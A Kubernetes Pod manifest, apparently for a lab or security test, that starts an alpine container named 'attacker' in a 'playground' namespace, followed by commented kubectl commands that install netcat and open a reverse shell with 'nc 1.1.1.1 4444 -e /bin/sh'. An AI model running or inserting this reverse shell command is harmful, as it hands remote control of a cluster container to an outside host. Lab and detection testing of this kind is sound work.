apiVersion: v1
kind: Pod
metadata:
  name: pod-delete-test
  namespace: playground
spec:
  containers:
  - name: attacker
    image: alpine
    command: ["/bin/sh", "-c", "sleep 3600"]


# kubectl apply -f pod-delete.yaml
# kubectl exec -n playground pod-delete-test -- apk add netcat-openbsd
# kubectl exec -n playground pod-delete-test -- sh -c "nc 1.1.1.1 4444 -e /bin/sh"

